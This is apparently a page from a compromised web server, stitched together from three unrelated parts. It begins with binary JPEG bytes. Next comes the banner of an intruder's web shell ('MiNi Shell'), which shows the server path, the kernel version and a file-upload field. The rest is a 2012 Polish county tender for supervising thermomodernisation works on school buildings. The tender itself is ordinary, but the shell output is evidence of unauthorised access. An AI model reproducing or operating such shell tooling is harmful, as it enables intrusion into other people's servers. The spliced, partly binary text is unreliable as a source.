JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120612/128493-N-2012.html

<p class="kh_header"><b>Września: Pełnienie przez Wykonawcę obowiązków inspektora nadzoru ds.:
-konstrukcyjno - budowlanych; 
- instalacji wodnokanalizacyjnych i centralnego ogrzewania;
- instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
zgodnie z art. 25 i 26 ustawy Prawo budowlane (Dz. U. z 2010r. nr 243,poz. 1623 ze zm.) przy realizacji zadania pn.: Termomodernizacja budynków użyteczności publicznej na terenie powiatu Wrzesińskiego.</b><br>
<b>Numer ogłoszenia: 128493 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Fryderyka Chopina 10, 62-300 Września, woj. wielkopolskie, tel. 061 6402051, 6404457, faks 061 6402051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wrzesnia.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie przez Wykonawcę obowiązków inspektora nadzoru ds.:
-konstrukcyjno - budowlanych; 
- instalacji wodnokanalizacyjnych i centralnego ogrzewania;
- instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
zgodnie z art. 25 i 26 ustawy Prawo budowlane (Dz. U. z 2010r. nr 243,poz. 1623 ze zm.) przy realizacji zadania pn.: Termomodernizacja budynków użyteczności publicznej na terenie powiatu Wrzesińskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  Zamówienia  jest  pełnienie  przez Wykonawcę obowiązków inspektora nadzoru ds.:
- konstrukcyjno - budowlanych; 
- instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
zgodnie z art. 25 i 26 ustawy Prawo budowlane (Dz. U. z 2010r. nr 243, poz. 1623 ze zm.) przy realizacji zadania pn.: Termomodernizacja budynków użyteczności publicznej na terenie powiatu wrzesińskiego współfinansowana z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu III Środowisko Przyrodnicze Działania 3.2 Infrastruktura energetyczna przyjazna środowisku , Schematu 2 Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.  W ramach niniejszego postępowania zostaną objęte 2 budynki  stanowiące własność powiatu wrzesińskiego. 
2.	Do zadań inspektora nadzoru inwestorskiego należy pełny zakres czynności określonych w art. 25 i 26  ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U.  z 2010 r.  Nr 243 poz. 1623
ze zm.):
--Inspektor nadzoru inwestorskiego ma obowiązek:
 1) reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
2) sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
3) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 
4) uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych 
5) przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
6) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, 
7) kontrolowanie rozliczeń budowy (wyłącznie na żądanie inwestora).
8) współpracowanie z ornitologiem w szczególności w zakresie realizacji decyzji wydanych przez Regionalną Dyrekcję Ochrony Środowiska dotyczy cz. I i II;
-- Inspektor nadzoru inwestorskiego ma prawo:
1) wydawać kierownikowi budowy lub kierownikowi robót poleceń (potwierdzone wpisem do dziennika budowy), dotyczące: 
- usunięcia nieprawidłowości lub zagrożeń, 
- wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, 
- przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych.
2) żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót
3) wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę. 
 
3.	Zakres robót objętych nadzorem obejmuje:
- nadzór inwestorski nad pracami termomodernizacyjnymi budynku dydaktycznego i internatu Zespołu Szkół Technicznych i Ogólnokształcących, ul. Kaliska 2a polegającymi na ociepleniu dachu budynku internatu oraz pracami związanymi z dociepleniem dachu oraz ścian budynku dydaktycznego. Kod CPV 45261410-1 - izolowanie dachu. Kod CPV 45453000-7 roboty remontowe i renowacyjne. Kod CPV 45321000-3 - izolacja cieplna.
- nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na montażu solarów na dachu budynku dydaktycznego, montaż urządzeń węzła solarnego w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu, budowie instalacji ciepłej wody użytkowej między budynkami dydaktycznym i internatu. Kod CPV 09331100-9 kolektory słoneczne do produkcji ciepła. Kod CPV 45331100-7 - instalowanie centralnego ogrzewania.
- nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na robotach instalacji wodnokanalizacyjnych w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu. Kod CPV 45332200-5 roboty instalacyjne, hydrauliczne.
-  nadzór inwestorski nad robotami remontowo - budowlanymi związanymi z adaptacją pomieszczenia kotłowni w budynku internatu na węzeł solarny. Kod  CPV 45453000-7 - roboty remontowe 
i renowacyjne.
- nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na wykonaniu instalacji elektrycznej z osprzętem w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu. Kod CPV 45310000-3 - roboty instalacyjne elektryczne.

4. Zamawiający dopuszcza  możliwości składania ofert częściowych.
Postępowanie podzielone jest na 5 części:

Część I - nadzór inwestorski nad pracami termomodernizacyjnymi budynku dydaktycznego i internatu Zespołu Szkół Technicznych i Ogólnokształcących, ul. Kaliska 2a polegającymi na ociepleniu dachu budynku internatu oraz pracami związanymi z dociepleniem dachu oraz ścian budynku dydaktycznego. Kod CPV 45261410-1 - izolowanie dachu. Kod CPV 45453000-7 roboty remontowe i renowacyjne. Kod CPV 45321000-3 - izolacja cieplna.
W.w prace obejmują m.in.:
Budynek internatu:
-	rozebranie rynien z blachy
-	rozebranie obróbek blacharskich
-	wymiana z dorobieniem uchwytów do rynien i rur spustowych
-	dorobienie kolanek do rur spustowych
-	docieplenie stropodachu styropapą gr. 18 cm o wsp. lambda 0,045
-	pokrycie dachu papą termozgrzewalną 1 warstwową  
-	obróbki blacharskie 
-	ponowny montaż rynien z demontażu z naprawą uszkodzeń
-	wywóz elementów z rozbiórek
-	wymiana wsporników instalacji odgromowej na dachu 
-	wymiana przewodów instalacji odgromowej na dachu z połączeniem z istniejącą
-	badanie i pomiar instalacji odgromowej ze sporządzeniem protokołu
-	spełnienie wszystkich wymagań Zamawiającego, z uwzględnieniem zakresu robót podanym 
w przedmiarze robót .poz.1 do 15
-	uporządkowanie terenu
Budynek dydaktyczny:
-	rozebranie rynien z blachy
-	rozebranie obróbek blacharskich
-	wymiana z dorobieniem uchwytów do rynien i rur spustowych
-	dorobienie kolanek do rur spustowych
-	pokrycie dachu papą termozgrzewalną 
-	czapki kominowe
-	montaż konstrukcji wsporczej pod kolektory
-	obróbki blacharskie 
-	ponowny montaż rynien z demontażu z naprawą uszkodzeń
-	wywóz elementów z rozbiórek
-	wymiana wsporników instalacji odgromowej na dachu 
-	wymiana przewodów instalacji odgromowej na dachu z połączeniem z istniejącą
-	badanie i pomiar instalacji odgromowej ze sporządzeniem protokołu
-	spełnienie wszystkich wymagań Zamawiającego, z uwzględnieniem zakresu robót podanym w przedmiarze robót .poz.1 do 18
-	wykop z izolacją ścian fundamentowych;
-	tynki cementowo-wapienne na ścianach i ościeżnicach kat. III;  
-	instalację odgromową;
-	docieplenie stropodachu wełną granulowaną;
-	docieplenie ścian cokołu styropianem;
-	wymianę parapetów zewnętrznych; 
-	tynk mineralny na ścianach i ościeżnicach;
-	tynk żywiczny na cokole; 
-	malowanie tynków mineralnych farbą silikonową 3-krotne;
-	demontaż rury wentylacyjnej;
-	montaż nawiewników higrosterowanych;
-	wymianę pokrycia daszku najściowego do piwnicy;
-	opaskę wkoło budynku z kostki brukowej;
-	demontaż krat okiennych.
-	uporządkowanie terenu

Część II -  nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na montażu solarów na dachu budynku dydaktycznego, montaż urządzeń węzła solarnego w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu, budowie instalacji ciepłej wody użytkowej między budynkami dydaktycznym i internatu. Kod CPV 09331100-9 kolektory słoneczne do produkcji ciepła. Kod CPV 45331100-7 - instalowanie centralnego ogrzewania. W.w prace obejmują m.in.:
- wykucie bruzd pionowych i poziomych i ich zamurowanie;
- montaż przewodów z rur stalowych b szwu;
- montaż armatury odcinającej, regulacyjnej;
- montaż urządzeń;
- montaż izolacji;
- montaż węzła instalacji solarnej na potrzeby c.w.u.;
- próby szczelności,;
- płukanie instalacji;
- regulację instalacji;
- montaż chłodnic awaryjnych;
.
 Część III -  nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na robotach instalacji wodnokanalizacyjnych w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu. Kod CPV 45332200-5 roboty instalacyjne, hydrauliczne. W.w prace obejmują m.in.:
- instalacja rurociągu kanalizacyjnego;
- instalacja wpustów podłogowych;
- wpięcie instalacji do studzienki zbiorczej;
- instalacja rurociągów stalowych;
- montaż umywalek;
- instalacja kratek wentylacyjnych;  

Część IV - nadzór inwestorski nad robotami remontowo - budowlanymi związanymi z adaptacją pomieszczenia kotłowni w budynku internatu na węzeł solarny. Kod  CPV 45453000-7 - roboty remontowe i renowacyjne. W.w prace obejmują m.in.:
- odbicie tynków ze ścian i wykonanie nowych;
- wykonanie ścianki działowej E160;
- montaż drzwi E130;
- wykonanie izolacji z papy; 
- wykonanie izolacji ze styropianu gr. 20 cm;
- wykonanie izolacji z folii;
- wykonanie posadzki betonowej zbrojonej gr. 20 cm;
- wykonanie posadzki wierzchniej z płytek ceramicznych;
- malowanie ścian i sufitów;
- obniżanie sufitu płytami N/G;
-wykonanie fundamentu pod bufory;
- wykonanie kratek ściekowych;
- wykonanie nadproży drzwiowych;
- zamurowanie otworów drzwiowych.

Część V - nadzór inwestorski nad pracami termomodernizacyjnymi polegającymi na wykonaniu instalacji elektrycznej z osprzętem w adaptowanym na węzeł solarny pomieszczeniu kotłowni w budynku internatu. Kod CPV 45310000-3 - roboty instalacyjne elektryczne. W.w prace obejmują m.in.:
- demontaż skrzynek i rozdzielni skrzynkowych;
- instalowanie wyłącznika nadprądowego2-biegunowego w rozdzielniach;
- wykucie bruzd dla przewodów wtynkowych w cegle;
- instalowanie przewodów kabelkowych;
- instalowanie puszek podtynkowych;
- instalowanie gniazd wtyczkowych;
- instalowanie aparatów elektrycznych;
- instalowanie opraw oświetleniowych przykręcanych;
- instalowanie przewodów uziemiających i wyrównawczych;
- sprawdzanie i pomiar obwodów elektrycznych;
- pomiary rezystancji instalacji elektrycznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamierza się udzielić zamówień uzupełniających nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 45.26.14.10-1, 45.45.30.00-7, 45.31.00.00-3, 45.32.10.00-3, 45.33.11.00-7, 45.33.22.00-5, 09.33.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten wykonawca spełni składając oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie  przez Wykonawcę spełniony, gdy wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia  działalności jest  krótszy - w tym okresie, co najmniej 1 usługę nadzoru nad pracami, których przedmiotem były:
- roboty budowlane w zakresie konstrukcyjno - budowlanym o wartości co najmniej w zakresie części:
a)  Część I - 310 000,00zł
b) Część IV - 29 000,00zł
z podaniem ich rodzaju i wartości daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie. Według  załącznika nr 5.
-  roboty instalacyjne w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
o wartości co najmniej w zakresie części:
c)  Część II -300.000,00 zł
d) Część III- 2.500,00 zł
z podaniem ich rodzaju i wartości daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie. Według  załącznika nr 5.
-  instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
       e)  Część V - 5 500,00zł
z podaniem ich rodzaju i wartości daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie. Według  załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli wykonawca złoży oświadczenie, że osoba, która będzie pełnić funkcję inspektora nadzoru posiada uprawnienia budowlane o specjalności:
- konstrukcyjno-budowlanej (dotyczy części I . IV )
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (dotyczy części II , III);
-  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (dotyczy części V )
oraz przynależy do właściwej izby samorządu zawodowego i jest ubezpieczona od odpowiedzialności cywilnej w zakresie prowadzonej działalności - dotyczy każdej części postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie przez Wykonawcę spełniony, gdy wykaże, że posiada ubezpieczenie OC działalności na kwotę ubezpieczenia odpowiadającej kwocie co najmniej w zakresie części:
a) Część I - 360 000,00zł
b) Część II - 370.000,00 zł
c) Część III - 2.900,00 zł
d) Część IV - 30 000,00zł 
e) Część V - 6.000,00zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia mogą być dokonane wyłącznie pisemnie w formie aneksu do umowy podpisanego przez obie strony.
Zamawiający dopuszcza zmianę umowy w przypadku m.in.:
- zmiany osoby wykonującej obowiązki inspektora nadzoru, w przypadku niemożności pełnienia powierzonych funkcji (zdarzenie losowe, choroba, rezygnacja z pracy, zmiana pracy oraz inne ważne przyczyny uniemożliwiające wykonanie zamówienia;
- toczącego się postępowania odwoławczego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrzesnia.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe we Wrześni
ul. Chopina 10
62-300 Września.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 12:00, miejsce: Starostwo Powiatowe we Wrześni
ul. Chopina 10
62-300 Września
kancelaria pok 11a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu III Środowisko Przyrodnicze Działania 3.2 Infrastruktura energetyczna przyjazna środowisku, Schematu 2 Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.</p>
